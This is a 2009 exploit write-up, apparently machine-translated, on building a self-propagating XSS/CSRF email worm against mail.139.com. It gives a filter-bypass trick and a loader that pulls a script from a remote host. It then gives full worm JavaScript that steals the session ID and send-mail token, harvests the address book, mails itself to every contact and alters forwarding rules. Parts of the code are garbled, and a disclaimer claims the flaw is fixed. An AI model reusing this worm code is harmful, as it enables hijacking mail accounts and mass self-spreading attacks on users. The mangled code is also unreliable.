139 email worm compiling example
Author: [sh0wrun], [woyigui]
Date: 2009-09-09
Disclaimer: the vulnerability has been reported and repaired. Do not use it for illegal purposes.
Principle Analysis:
We often use mail.139.com, which is prone to xss vulnerabilities due to lax filtering of mail bodies. Although they implement Filtering for style = "xss: expression", they can bypass it by adding/**/, for example :. After adding/**/, the script can be executed in IE browser.
At the same time, it is found that the function of sending emails in mail.139.com has the CSRF weakness. You can use Ajax technology to obtain the mid value required for sending emails. In addition, the contact email in the email address book can be taken directly through javascript.
The three conditions for compiling csrf worm are met. The next step is to compile javascript code.
Cross-site code:
The function to be implemented is to trigger the browser to read the remote js script and execute the script:
Original:
Var ig = document. createElement ("script"); ig. src = "http: // 192.168.9.104/woyigui/139.js"; try {document. getElementsByTagName ("body") [0]. appendChild (ig);} catch (e) into document.doc umentElement. appendChild (document. createElement ("body"); document. getElementsByTagName ("body") [0]. appendChild (ig );}
This part of the encoding is encoded in decimal format to avoid the keyword being replaced and called:
This part of code needs to be placed in the mail body for transmission.
Script Function implementation:
The following functions are implemented:
1. Read the contact's email address through a script.
This part of information can be obtained through top. LinkManList. concat.
2. Obtain the sid value through the script.
This part of information can be obtained through window. top. location. href and the regular expression.
3. Get the mid value required for sending an email
After obtaining the sid value, open the "Write email" page using script to read the mid value.
4. send an email
The send mail function only verifies the mid value. Therefore, after obtaining the correct mid value, it constructs post data and sends the mail together with the obtained contact.
5. Rewrite Email Forwarding rules and automatic reply rules
Construct a post with the correct sid.
Complete code:
var xssed = false; if (typeof XSSflag != "undefined"){ xssed = true; } var XSSflag = [ {name: "version", url: "1.0"}, ]; if ( xssed != true ) { var xmlhttp; //create XHR function createXMLHttp(){ try { xmlhttp = new XMLHttpRequest(); } catch (e) { var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP' ); var success = false; for (var i=0;i < XMLHTTP_IDS.length && !success; i++) { try { xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]); success = true; } catch (e) {} } if (!success) { throw new Error('Unable to create XMLHttpRequest.'); } } } function domid (dourl) { createXMLHttp(); var tmp = ""; xmlhttp.open("GET", dourl, false); xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.send(null); setTimeout( tmp = xmlhttp.responseText,500); return tmp; } function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){ createXMLHttp(); var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype= send.x&idOpType=&text="+ Content +"&destcgi= &funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year= &month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent= xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded;"); y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0"; xmlhttp.open("POST", doUrl, false); xmlhttp.setRequestHeader("Content-length", params.length); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.send(params); } function doMyAjax() { var strPer = '/coremail/cgi/attachfapps'; var tomail = '
;'; var subject = "test20"; var Content = ""; var account = ""; var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1"); var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid ); var mid="",text=""; text=tmpmid.split("\n"); for (var i=0;i < text.length; i++) { var patt=/name=\"mid\" value=\"/; if ( patt.test(text[i])) { mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1"); break; } } var mail_address=top.LinkManList.concat(); for (var i=0,len=mail_address.length;i
;"; } } try { startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject),
encodeURIComponent(Content), encodeURIComponent(account), mid, sid ); } catch (e) { alert("send data error!"); } } doMyAjax(); } |
- Gain a deep understanding of the worm in the Network
- Conficker worms can detonate "Network nuclear weapons" at any time"
- Storm worms may launch retaliatory attacks to security personnel